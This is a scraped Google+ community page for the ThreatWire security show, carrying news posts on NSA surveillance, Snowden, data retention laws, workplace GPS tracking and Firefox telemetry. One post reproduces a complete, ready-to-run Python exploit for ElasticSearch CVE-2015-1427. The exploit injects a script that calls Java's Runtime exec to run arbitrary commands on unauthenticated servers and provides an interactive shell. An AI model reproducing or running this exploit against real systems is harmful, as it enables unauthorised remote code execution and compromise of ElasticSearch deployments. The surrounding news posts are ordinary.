Fighting all the things that threaten privacy, security and our Internet
See all
Members (3,262)
Darren Kitchen's profile photo
Robb Dunphy's profile photo
Shannon Morse's profile photo
! "(AB" A! " (FACEBOOK)"'s profile photo
Aaron eustich's profile photo
Adam Goddard's profile photo
Abhishek Solanki's profile photo
Adam Faircloth's profile photo
Abram Ruiz (Jonas Echoes)'s profile photo
666c6176696f 73696c7661's profile photo
Adam Frantz (OneQuarterFelix)'s profile photo
Adam Goddard's profile photo
Abdushakur Arina Jamwa's profile photo
Aaron Bay's profile photo
Aaron Clark's profile photo
Aaron Gersztoff's profile photo
Aaron Hoyt's profile photo
aaron crayden's profile photo
abubeker nasir's profile photo
Aaron M's profile photo
Aaron Merhoff's profile photo
Aaron Muccino (PrescRx)'s profile photo
Abdul 007's profile photo
Aaron Parker's profile photo

Stream

Join this community to post or comment

Shannon Morse
moderator

Discussion  - 
 
Ring ring! This is the NSA, this call isn’t currently being recorded, but the IRS is giving out your information, and so are adult dating websites...
4
Add a comment...

rami ram

Security  - 
 
The NSA developed a plan to deliver malware through Google and Samsung app stores, according to newly published documents obtained by Edward Snowden and published by The Intercept. The documents...
3
3
Ezar Vasquez's profile photolastlight21's profile photo
Add a comment...
 
 
Perhaps we will finally have secure medical devices with these new guidelines.
View original post
2
Jon Armani's profile photoJeremy Arthur's profile photo
2 comments
 
yes it is.
Add a comment...

Alan Char

Security  - 
 
Is 1 million frequent flyer miles on United a prize or a penalty?
1
Add a comment...

rami ram

Privacy  - 
 
An employee is fired after disabling a GPS application that followed his movements
Outside working hours
Myrna Arias, resident of California Center filed a complaint against his former employer Intermex, having been referred unfairly.

Intermex is a company specializing in the transfer of money abroad. During a brief stint in the company as a commercial, Arias has generated an average of $ 7,250 per month for the company. It has also met all of its monthly goals, but that did not stop her employer to fire her. The reason is that it has a working uninstalled application she and her colleagues were forced to run at any time.

The iPhone application known as Xora, allows the supervisor to monitor his subordinates while traveling during work hours. What might appear legitimate if it wants to ensure that his team is indeed among customers and do not waste time doing other things during the hours reserved for work.

But where Myrna Arias shouted his ras-le-bol is when she learned that the application followed his movements 24 hours / 24 and 7/7. Xora provides an option to disable the application, however, this option does not stop the GPS tracking feature.

John Stubits, the boss of Arias, boasted also be able to track all trips outside of working hours and even though she is on leave. It is with pleasure that he claimed to know "how fast she was driving at specific times since it installed the app on his phone" and the time she spent with clients, says the complaint to the Superior Court Kern County.

As explained by the complainant, "she had no problem with the GPS feature of the application during the working hours, but it is opposed to the monitoring of its location outside of working hours and was Stubits complaint that it was an invasion of his privacy. " It compares the tracking application in the iPhone a "ankle bracelet from a prisoner" and therefore uninstalled from his phone.

After being reprimanded for his action, Mr. John Stubits was quick to turn then, despite his performance work results. Mrs Arias believes that the termination of his contract was "in violation of fundamental public policies, and substantial base in the state of California." She filed a complaint for justice, claiming damages of more than $ 500,000 for breach of privacy. It also complains of unfair trade practices of his former employer.
1
Add a comment...

Rick Webb

Discussion  - 
 
The irony of posting this on g+ is not wasted on me, that said I am wondering if there is community interest in making a secure version of android, one that out of the box does not connect all your details to google etc. Pre installed secure messaging apps. No google apps that can't be removed etc.
1
Jon Armani's profile photoRick Webb's profile photo
2 comments
 
Thanks, I will give these a look
Add a comment...

Hak5

Discussion  - 
 
https://youtu.be/wzXVTC7cOWY

#NSA Metadata Collection is illegal, #SKYNET is Real, #Microsoft axes Patch Tuesday - ThreatWire

The NSA Program to collect bulk call data "metadata" has been ruled illegal by an appeals court. Leaked documents uncover SKYNET - an NSA program to target terrorists with such metadata. And Microsoft ends its monthly sysadmin-happy-fun-time which was Patch Tuesday.

Support #ThreatWire! https://www.patreon.com/ThreatWire
14
6
Eric Graham's profile photoKeith P's profile photo
Add a comment...

rami ram

Privacy  - 
 
Bulk collection of millions of Americans’ phone records is ruled unlawful, as opponents of program including Rand Paul share their delight
1
Add a comment...
 
They need to use this technology to help improve consumer speech recognition products. I mean, some of the stuff they create had potential, it just needs used for proper means!
1
Add a comment...

About this community

ThreatWire by Hak5 is a YouTube show covering the security and privacy issues threatening our Internet. From breaches and policies to social networks and censorship, ThreatWire takes the practical and tinfoil hat angles to dispel fear, uncertainty and doubt.

rami ram

Privacy  - 
 
Tonight, the US Senate failed to move ahead with the USA Freedom Act, an NSA reform bill that would address phone record surveillance and FISA Court transparency and fairness. It also was unable to muster votes for a temporary reauthorization of Section 215 of the Patriot Act, the section of law used to justify the mass phone records surveillance program. That’s good news: if the Senate stalemate continues, the mass surveillance of everyone’s pho...
1
Add a comment...

rami ram

Security  - 
 
ElasticSearch Unauthenticated Remote code execution
Not secure anymore !

Darren Martyn, Xiphos researchers found a way to exploit remote elastic users through a vulnerable java class  (java.lang.Math.class.forName)

Here is the fscript as following :
#!/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150309.1
# Licence: WTFPL - wtfpl.net
import json
import requests
import sys
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
_version_ = "20150309.1"
 
def banner():
    print """\x1b[1;32m
▓█████  ██▓    ▄▄▄        ██████ ▄▄▄█████▓ ██▓ ▄████▄    ██████  ██░ ██ ▓█████  ██▓     ██▓   
▓█   ▀ ▓██▒   ▒████▄    ▒██    ▒ ▓  ██▒ ▓▒▓██▒▒██▀ ▀█  ▒██    ▒ ▓██░ ██▒▓█   ▀ ▓██▒    ▓██▒   
▒███   ▒██░   ▒██  ▀█▄  ░ ▓██▄   ▒ ▓██░ ▒░▒██▒▒▓█    ▄ ░ ▓██▄   ▒██▀▀██░▒███   ▒██░    ▒██░   
▒▓█  ▄ ▒██░   ░██▄▄▄▄██   ▒   ██▒░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒  ▒   ██▒░▓█ ░██ ▒▓█  ▄ ▒██░    ▒██░   
░▒████▒░██████▒▓█   ▓██▒▒██████▒▒  ▒██▒ ░ ░██░▒ ▓███▀ ░▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
░░ ▒░ ░░ ▒░▓  ░▒▒   ▓▒█░▒ ▒▓▒ ▒ ░  ▒ ░░   ░▓  ░ ░▒ ▒  ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓  ░░ ▒░▓  ░
 ░ ░  ░░ ░ ▒  ░ ▒   ▒▒ ░░ ░▒  ░ ░    ░     ▒ ░  ░  ▒   ░ ░▒  ░ ░ ▒ ░▒░ ░ ░ ░  ░░ ░ ▒  ░░ ░ ▒  ░
   ░     ░ ░    ░   ▒   ░  ░  ░    ░       ▒ ░░        ░  ░  ░   ░  ░░ ░   ░     ░ ░     ░ ░  
   ░  ░    ░  ░     ░  ░      ░            ░  ░ ░            ░   ░  ░  ░   ░  ░    ░  ░    ░  ░
                                              ░                                               
 Exploit for ElasticSearch , CVE-2015-1427   Version: %s\x1b[0m""" %(__version__)
 
def execute_command(target, command):
    payload = """{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"}}}""" %(command)
    try:
        url = "http://%s:9200/_search?pretty" %(target)
        r = requests.post(url=url, data=payload)
    except Exception, e:
        sys.exit("Exception Hit"+str(e))
    values = json.loads(r.text)
    fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0]
    print fuckingjson.strip()
         
 
def exploit(target):
    print "{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something"
    while True:
        cmd = raw_input("~$ ")
        if cmd == "exit":
            sys.exit("{!} Shell exiting!")
        else:
            execute_command(target=target, command=cmd)
     
def main(args):
    banner()
    if len(args) != 2:
        sys.exit("Use: %s target" %(args[0]))
    exploit(target=args[1])
 
if _name_ == "__main__":
    main(args=sys.argv)
1
Add a comment...

Shannon Morse
moderator

Discussion  - 
 
Mobile Encryption, Safari Browser’s Flaw, Laplace’s Demon, and Hackers on a Plane! - Threat Wire: http://youtu.be/KLG5dfPm2mw?a  
12
Jon Armani's profile photo
 
I believed in Laplace's Demon until I understood more about quantum physics and truly random events. 
Add a comment...

rami ram

Privacy  - 
 
By default, mozilla firefox browser sends report concerning health & bugs occuring to be fixed on the next release but one thing trickled my nerds once : what if I get hijacked without knowing & my firefox reports go somewhere else rather than firefox dev team!!
More again: an option I found on firefox browser 38.0.1 was data sharing which is enabled BY DEFAULT !!!

I turned it off right after it caught my eye on :)

Ummmmm; started taking care even from firefox know :(
3
Add a comment...

rami ram

Privacy  - 
 
Tails, the operating system trusted by Edward Snowden, just released a new version. Here's what you'll find in it, as well as what all the Tails hub-bub is about.
2
1
Keith P's profile photo
Add a comment...

Alan Char

Privacy  - 
 
Your prescription records aren't private.
 
Alternatively: "Prescription drug database access, a warrantless activity"
Authorities dig through prescription med databases thanks to pre-digital age precedent.
View original post
1
Add a comment...

rami ram

Privacy  - 
 
Edward Snowden says Australia’s new data retention laws are 'dangerous'

Whistleblower says mass surveillance did not stop the Sydney siege, the Boston marathon bombings or the Charlie Hebdo magazine attack in Paris

Edward Snowden has called Australia’s new data retention laws “dangerous” and insisted mass surveillance has allowed acts of terror to occur rather than foiled attacks.
Snowden, the whistleblower who revealed the extent of surveillance conducted by the US National Security Agency, told a Melbourne audience Australia is adopting data retention laws that “have been proven not to work”.
“Australia’s role in mass surveillance around the world is similar to the UK and the Tempora program,” Snowden said via satellite from Moscow.
“They’ll collect everyone’s communications, it’s called pre-criminal investigation, which means they are watching everyone all the time. They can search through that information not just in Australia but also share with overseas governments such as the US and UK. And it happens without oversight.”
Australia’s metadata laws were passed in March. They require telecommunications companies to store information on their customers for up to two years; a move the federal government has said will help combat terrorism.
Snowden, who was appearing at the Progress 2015 conference on Friday evening, said such laws are a “radical departure from the operation of traditional liberal societies around the world”.
“The impacts of metadata can’t be overstated, they are collecting data on everyone regardless of wrongdoing. When you have metadata, it’s a proxy for content, so when politicians split hairs about metadata you should be very sceptical.”
Snowden said mass surveillance had not stopped the Sydney siege, the Boston marathon bombings or the attack on the Charlie Hebdo magazine in France.
“These were people who have a long record and the reason these attacks happened isn’t because we didn’t have enough surveillance, it’s that we had too much,” he said. “We didn’t prioritise because we’d wasted too many resources watching people who didn’t present a threat.”
Snowden said governments needed to cooperate to avoid a world “where we choose between surveillance and security”.
The former NSA computer contractor, who first revealed details of mass surveillance to the Guardian in 2013, spoke on the same day a US federal court ruled mass storage of telephone data was illegal.
Snowden said the ruling was “very significant” and could lead to further legal challenges of mass surveillance.
He also criticised Australia’s attorney general, George Brandis, claiming he “doesn’t even know what metadata is”, and said people who say they don’t worry about their privacy because they have nothing to hide “is like saying I don’t care about free speech because I have nothing to say”.
Greens senator Scott Ludlam, who took part in a panel discussion with Snowden, said intelligence agencies in Australia operate with the “bare minimum of scrutiny”.
“The debate in Australia is so stifled,” he said. “In Australia we’re told these people are traitors, they are a national security threat and to just trust the government as everything will be fine.
“Civil society needs to be stronger on this stuff of we’ll be done over again.”

Source: theguardian 09/05/2015
1
Add a comment...